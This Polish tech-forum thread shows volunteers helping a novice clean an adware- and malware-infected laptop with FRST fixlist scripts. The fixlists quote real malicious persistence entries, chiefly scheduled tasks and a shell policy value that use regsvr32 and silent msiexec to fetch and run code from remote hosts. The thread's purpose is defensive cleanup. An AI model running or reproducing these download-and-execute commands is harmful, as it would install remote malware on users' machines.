Elektroda.pl
Elektroda.pl
X
CControls
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Wirusy na kompie logi z FRST

Paulikg 28 Kwi 2017 14:53 393 12
  • #1 28 Kwi 2017 14:53
    Paulikg
    Poziom 3  

    Bardzo proszę o pomoc. Od kilku dni mam jakieś wirusy i z laptopem źle się dzieje.
    Jestem totalnym amatorem w informatyce - proszę o "łopatologiczne" wytłumaczenie
    Oto logi FRST

    0 12
  • CControls
  • Pomocny post
    #2 28 Kwi 2017 16:59
    krzychupar
    Poziom 41  

    Odinstaluj:
    McAfee
    YAC(Yet Another Cleaner!) (HKLM-x32\...\iSafe) (Version: - ELEX DO BRASIL PARTICIPAÇÕES LTDA) <==== UWAGA

    Otwórz notatnik systemowy i wklej:
    HKU\S-1-5-21-4253878588-1971098093-3892347002-1001\...\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) <==== UWAGA
    Task: {49800960-BAA3-47D5-A375-CEFE67AC8A44} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj8yRYM5MThQNkRQFkZYMYI2OTH2NkI4OTI1MUY8NYUcMF== scrobj.dll
    HKU\S-1-5-21-4253878588-1971098093-3892347002-1001\...\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) <==== UWAGA
    Task: {49800960-BAA3-47D5-A375-CEFE67AC8A44} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj8yRYM5MThQNkRQFkZYMYI2OTH2NkI4OTI1MUY8NYUcMF== scrobj.dll
    Task: {51FC848F-C73B-421E-A70C-FAAE0BB4D44D} - System32\Tasks\McAfee\McAfee Idle Detection Task
    Task: {669F2E4C-C0B7-4295-97A0-D193B19D1DC2} - System32\Tasks\T0528 => msiexec.exe /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q
    Task: {9C270C07-D468-430C-A9AB-408E2B835B7A} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe [2017-02-22] (McAfee, Inc.)
    Task: {A26BA74D-0158-41D1-AA06-34D3D99A3FBA} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj8yRYM5MThQNkRQFkZYMYI2OTH2NkI4OTI1MUY8NYUcMF== scrobj.dll
    Task: C:\WINDOWS\Tasks\WpsExternal_pauli_20170219082156.job => C:\Program Files (x86)\Kingsoft\WPS Office\ksolaunch.exe ~/wpscloudlaunch /run_plugin /plugin_name=ktaskschdtool /plugin_entry=ktaskschdtool.dll
    Task: C:\WINDOWS\Tasks\WpsKtpcntrQingTask_pauli.job => C:\Program Files (x86)\Kingsoft\WPS Office\10.2.0.5811\office6\ktpcntr.exe Ãqing 10.2.0.5811 xxx server_url=hxxp:/kdl1.cache.wps.com/ksodl/wpscfg/client/____client____html____service____bubble.html ic_server_url=hxxp:/info.kingsoftstore.com/wpsv6internet/infos.ads
    Shortcut: C:\Users\pauli\Favorites\Fotor for desktop.lnk -> hxxp://www.fotor.com/windows/review.htm
    Shortcut: C:\Users\pauli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
    Shortcut: C:\Users\pauli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
    Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
    Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)




    HKU\S-1-5-21-4253878588-1971098093-3892347002-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8yRYM5MThQNkRQFkZYMYI2OTH2NkI4OTI1MUY8NYUcMF== /q
    HKU\S-1-5-21-4253878588-1971098093-3892347002-1001\...\MountPoints2: {e54db133-d3d2-11e6-a990-448500c33c9a} - "F:\WD SmartWare.exe" autoplay=true
    ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku
    ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...e0812&uid=PLEXTORXPX-256M7VG_P02637121327
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...e0812&uid=PLEXTORXPX-256M7VG_P02637121327
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&...mp;uid=PLEXTORXPX-256M7VG_P02637121327&q={searchTerms}
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&...mp;uid=PLEXTORXPX-256M7VG_P02637121327&q={searchTerms}
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...e0812&uid=PLEXTORXPX-256M7VG_P02637121327
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...e0812&uid=PLEXTORXPX-256M7VG_P02637121327
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&...mp;uid=PLEXTORXPX-256M7VG_P02637121327&q={searchTerms}
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&...mp;uid=PLEXTORXPX-256M7VG_P02637121327&q={searchTerms}
    HKU\S-1-5-21-4253878588-1971098093-3892347002-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...e0812&uid=PLEXTORXPX-256M7VG_P02637121327
    HKU\S-1-5-21-4253878588-1971098093-3892347002-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...e0812&uid=PLEXTORXPX-256M7VG_P02637121327
    SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...mp;uid=PLEXTORXPX-256M7VG_P02637121327&q={searchTerms}
    SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...mp;uid=PLEXTORXPX-256M7VG_P02637121327&q={searchTerms}
    SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...mp;uid=PLEXTORXPX-256M7VG_P02637121327&q={searchTerms}
    SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...mp;uid=PLEXTORXPX-256M7VG_P02637121327&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-4253878588-1971098093-3892347002-1001 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...mp;uid=PLEXTORXPX-256M7VG_P02637121327&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-4253878588-1971098093-3892347002-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-21-4253878588-1971098093-3892347002-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...mp;uid=PLEXTORXPX-256M7VG_P02637121327&q={searchTerms}
    BHO: McAfee WebAdvisor BHO -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2017-04-18] (McAfee, Inc.)
    BHO-x32: McAfee WebAdvisor BHO -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2017-04-18] (McAfee, Inc.)
    Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2017-04-18] (McAfee, Inc.)
    Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2017-04-18] (McAfee, Inc.)
    Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2017-04-18] (McAfee, Inc.)
    Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2017-04-18] (McAfee, Inc.)
    Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\mcafee\MSC\McSnIePl64.dll [2017-02-28] (McAfee, Inc.)
    Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\MSC\McSnIePl.dll [2017-02-28] (McAfee, Inc.)
    FF Extension: (McAfee WebAdvisor) - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2017-04-24]
    FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
    FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
    FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
    FF Extension: (McAfee Anti-Spam Thunderbird Extension) - C:\Program Files\McAfee\MSK [2017-03-30] [Brak podpisu cyfrowego]
    FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2017-02-28] ()
    CHR HomePage: Default -> hxxp://www.ourluckysites.com/?type=hp&ts=...e0812&uid=PLEXTORXPX-256M7VG_P02637121327
    CHR StartupUrls: Default -> "hxxp://www.ourluckysites.com/?type=hp&ts=1492583801&z=e004306bc88e044eddfb6d0g6z5t1odw8bdc0b0e7o&from=che0812&uid=PLEXTORXPX-256M7VG_P02637121327"
    CHR DefaultSearchURL: Default -> hxxp://www.ourluckysites.com/search/?type=ds&...mp;uid=PLEXTORXPX-256M7VG_P02637121327&q={searchTerms}
    CHR DefaultSearchKeyword: Default -> ourluckysites
    CHR Extension: (McAfee® WebAdvisor) - C:\Users\pauli\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2017-03-14]
    CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
    HKU\S-1-5-21-4253878588-1971098093-3892347002-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) <==== UWAGA
    R2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [188264 2017-04-18] (McAfee, Inc.)
    R2 McAPExe; C:\Program Files\Common Files\McAfee\VSCore_15_6\McApExe.exe [994312 2017-03-13] (McAfee, Inc.)
    R2 McBootDelayStartSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [641520 2017-02-22] (McAfee, Inc.)
    R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\2.3.322.0\\McCSPServiceHost.exe [2054080 2017-02-28] (McAfee, Inc.)
    R2 McMPFSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [641520 2017-02-22] (McAfee, Inc.)
    R2 McNaiAnn; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [641520 2017-02-22] (McAfee, Inc.)
    S3 McODS; C:\Program Files\mcafee\VirusScan\mcods.exe [1344472 2017-02-24] (McAfee, Inc.)
    R2 mcpltsvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [641520 2017-02-22] (McAfee, Inc.)
    R2 McProxy; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [641520 2017-02-22] (McAfee, Inc.)
    R3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [241040 2017-01-18] (McAfee, Inc.)
    R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [385112 2017-01-18] (McAfee, Inc.)
    R3 mfevtp; C:\WINDOWS\system32\mfevtps.exe [343792 2017-01-18] (McAfee, Inc.)
    R2 ModuleCoreService; C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe [1551512 2017-02-26] (McAfee, Inc.)
    S3 MSK80Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [641520 2017-02-22] (McAfee, Inc.)
    R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
    S2 Kitty; C:\Users\pauli\AppData\Local\Kitty\Kitty.dll [X] <==== UWAGA
    S2 SNARE; C:\Users\pauli\AppData\Local\SNARE\Snarer.dll [X] <==== UWAGA
    R3 cfwids; C:\WINDOWS\System32\drivers\cfwids.sys [88464 2017-01-20] (McAfee, Inc.)
    S3 HipShieldK; C:\WINDOWS\System32\drivers\HipShieldK.sys [207968 2016-02-24] (McAfee, Inc.)
    R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
    S3 iSafeKrnlBoot; C:\WINDOWS\System32\DRIVERS\iSafeKrnlBoot.sys [55056 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
    S1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
    R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
    R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
    R3 mfeaack; C:\WINDOWS\System32\drivers\mfeaack.sys [487184 2017-01-20] (McAfee, Inc.)
    R3 mfeavfk; C:\WINDOWS\System32\drivers\mfeavfk.sys [366328 2017-01-20] (McAfee, Inc.)
    S0 mfeelamk; C:\WINDOWS\System32\drivers\mfeelamk.sys [85048 2017-01-23] (McAfee, Inc.)
    R3 mfefirek; C:\WINDOWS\System32\drivers\mfefirek.sys [518704 2017-01-20] (McAfee, Inc.)
    R0 mfehidk; C:\WINDOWS\System32\drivers\mfehidk.sys [923640 2017-01-20] (McAfee, Inc.)
    R3 mfencbdc; C:\WINDOWS\System32\DRIVERS\mfencbdc.sys [498648 2017-01-19] (McAfee, Inc.)
    S3 mfencrk; C:\WINDOWS\System32\DRIVERS\mfencrk.sys [109320 2017-01-19] (McAfee, Inc.)
    R3 mfeplk; C:\WINDOWS\System32\drivers\mfeplk.sys [110256 2017-01-20] (McAfee, Inc.)
    R3 mfesapsn; C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [46240 2016-06-06] (McAfee, Inc.)
    R0 mfewfpk; C:\WINDOWS\System32\drivers\mfewfpk.sys [254800 2017-01-20] (McAfee, Inc.)
    U3 aswbdisk; Brak ImagePath
    S3 dbx; system32\DRIVERS\dbx.sys [X]
    2017-04-28 12:16 - 2017-04-28 12:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
    2017-04-17 15:51 - 2017-04-17 15:51 - 00000000 ____D C:\Users\pauli\AppData\Roaming\Elex-tech
    2017-04-17 15:51 - 2017-04-17 15:51 - 00000000 ____D C:\Program Files (x86)\Elex-tech
    2017-04-17 15:51 - 2016-05-23 04:41 - 00055056 _____ (Elex do Brasil Participações Ltda) C:\WINDOWS\system32\Drivers\iSafeKrnlBoot.sys
    2017-04-17 15:50 - 2017-04-27 05:14 - 00000000 ____D C:\Users\pauli\AppData\Local\Kitty
    2017-03-30 12:13 - 2016-06-21 18:47 - 00000000 ____D C:\Program Files\Common Files\McAfee
    2017-03-30 12:12 - 2017-01-28 09:13 - 00003126 _____ C:\WINDOWS\System32\Tasks\McAfeeLogon
    2017-03-30 12:12 - 2017-01-28 09:13 - 00000000 ____D C:\WINDOWS\System32\Tasks\McAfee
    2017-04-07 22:40 - 2017-04-07 22:40 - 0370070 _____ () C:\Users\pauli\AppData\Roaming\11STIcon.ico
    2017-01-04 16:12 - 2017-04-28 06:38 - 0000166 _____ () C:\Users\pauli\AppData\Roaming\sp_data.sys
    2017-01-28 00:12 - 2017-02-18 19:00 - 0005632 _____ () C:\Users\pauli\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
    2017-04-22 17:01 - 2017-04-22 17:01 - 0057939 _____ () C:\Users\pauli\AppData\Local\recently-used.xbel
    2017-01-26 16:11 - 2017-01-26 16:35 - 0001056 ___SH () C:\ProgramData\KGyGaAvL.sys
    C:\Users\Public\VOIP.dat
    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść obok FRST w tym samym folderze.
    Uruchom FRST i kliknij w Fix/Napraw.

    0
  • Pomocny post
    #3 28 Kwi 2017 17:04
    Kolobos
    Spec od komputerów

    Po wykonaniu zamiesc nowe logi z FRST, ze skanowania.

    0
  • Pomocny post
    #4 28 Kwi 2017 17:15
    krzychupar
    Poziom 41  

    Dzięki Kolobos, bo zawsze zapominam powiadowmić autora tematu żeby zamieścił nowe logi po wykonaniu mojego skryptu.

    0
  • CControls
  • Pomocny post
    #6 28 Kwi 2017 20:29
    Acorus 20
    Spec od komputerów

    Odinstaluj WebStorage.Otwórz notatnik systemowy i wklej:

    CloseProcesses:
    IFEO\DisplaySwitch.exe: [Debugger]
    IFEO\taskmgr.exe: [Debugger]
    Edge HomeButtonPage: HKU\S-1-5-21-4253878588-1971098093-3892347002-1001 -> hxxp://www.ourluckysites.com/?type=hp&ts=1492...m=che0812&uid=PLEXTORXPX-256M7VG_P02637121327
    FF Extension: (HSearch) - C:\Users\pauli\AppData\Roaming\Firefox\Firefox\Profiles\1t1i0iqf.default\Extensions\@E97YHOMI-FU8L-IM23-VUT9-RVDZT7M8XL8H.xpi [2017-04-19] [Brak podpisu cyfrowego]
    FF Extension: (FF Adr) - C:\Users\pauli\AppData\Roaming\Firefox\Firefox\Profiles\1t1i0iqf.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-04-17] [Brak podpisu cyfrowego]
    FF SearchPlugin: C:\Users\pauli\AppData\Roaming\Firefox\Firefox\Profiles\1t1i0iqf.default\searchplugins\startsearch.xml [2017-04-17]
    S2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [X]
    2017-04-28 18:01 - 2017-04-28 18:03 - 00000000 _____ C:\Users\pauli\Regsvr32.exe
    2017-04-28 18:01 - 2017-04-28 18:03 - 00000000 _____ C:\Users\pauli\ourluckysites
    2017-04-28 18:01 - 2017-04-28 18:03 - 00000000 _____ C:\Users\pauli\msiexec.exe
    2017-04-28 18:01 - 2017-04-28 18:03 - 00000000 _____ C:\Users\pauli\DefaultScope
    2017-04-28 18:01 - 2017-04-28 18:03 - 00000000 _____ C:\Users\pauli\Brak
    2017-04-28 18:01 - 2017-04-28 18:03 - 00000000 _____ C:\Users\pauli\{33BB0A4E-99AF-4226-BDF6-49120163DE86}
    2017-04-28 18:01 - 2017-04-28 18:03 - 00000000 _____ C:\Users\pauli\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}
    C:\Users\pauli\msiexec.exe
    C:\Users\pauli\Regsvr32.exe

    Plik zapisz pod nazwą fixlist.txt i umieść obok FRST w tym samym folderze.
    Uruchom jako administrator FRST i kliknij w Fix/Napraw.
    Pobierz i uruchom jako administrator AdwCleaner https://toolslib.net/downloads/finish/1/ Kliknij Scan(Skanuj) i później Cleaning(Oczyść).

    0
  • #8 28 Kwi 2017 23:01
    Kolobos
    Spec od komputerów

    Wykonaj Fixlist.txt dla FRST:
    (Filseclab Corporation Limited) C:\Program Files (x86)\ScreenShot\SSSvc.exe
    R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited)
    C:\Program Files (x86)\ScreenShot\
    2017-04-28 22:23 - 2017-04-28 22:31 - 00000000 ____D C:\AdwCleaner
    2017-04-27 05:05 - 2017-04-27 05:05 - 00000000 ____D C:\Users\pauli\AppData\Local\Mozilla
    2017-04-21 11:32 - 2017-04-25 15:38 - 00000000 ____D C:\Program Files (x86)\AlphaGo
    2017-04-20 09:01 - 2017-04-25 15:38 - 00000000 _____ C:\WINDOWS\SysWOW64\22
    2017-04-20 09:01 - 2017-04-25 15:38 - 00000000 _____ C:\WINDOWS\SysWOW64\11
    2017-04-19 07:35 - 2017-04-20 08:15 - 00000000 ____D C:\Program Files (x86)\MK
    2017-04-17 18:09 - 2017-04-17 18:09 - 00000000 ____D C:\Program Files (x86)\temp
    2017-04-17 15:51 - 2017-04-28 22:31 - 00000000 ____D C:\WINDOWS\system32\log
    2017-04-17 15:50 - 2017-04-28 22:13 - 00000000 ____D C:\Users\pauli\AppData\LocalLow\Mozilla
    2017-04-17 15:50 - 2017-04-26 21:05 - 00000000 ____D C:\Program Files (x86)\MIO
    2017-04-17 15:50 - 2017-04-17 15:50 - 00000000 ____D C:\ProgramData\Software
    2017-04-17 15:45 - 2017-04-26 13:40 - 00000000 ____D C:\Program Files (x86)\BiaoJi
    2017-04-13 14:52 - 2017-04-13 14:52 - 00000000 ____D C:\Users\pauli\AppData\Roaming\SSMgre

    0
  • #9 29 Kwi 2017 06:27
    Paulikg
    Poziom 3  

    i mam wkleić ten tekst i zrobić napraw czy tylko utworzyć ten plik ?

    0
  • Pomocny post
    #10 29 Kwi 2017 08:52
    Kolobos
    Spec od komputerów

    Przeciez juz dwa razy to wykonywales, wiec zrob tak samo jak wczesniej. Tworzysz Fixlist.txt z podana zawartoscia i w FRST wybierz Napraw.

    0
  • Pomocny post
    #12 29 Kwi 2017 10:04
    Kolobos
    Spec od komputerów

    Usun katalog C:\FRST i to wszystko.

    0
  • #13 29 Kwi 2017 14:00
    Paulikg
    Poziom 3  

    Bardzo dziękuję

    0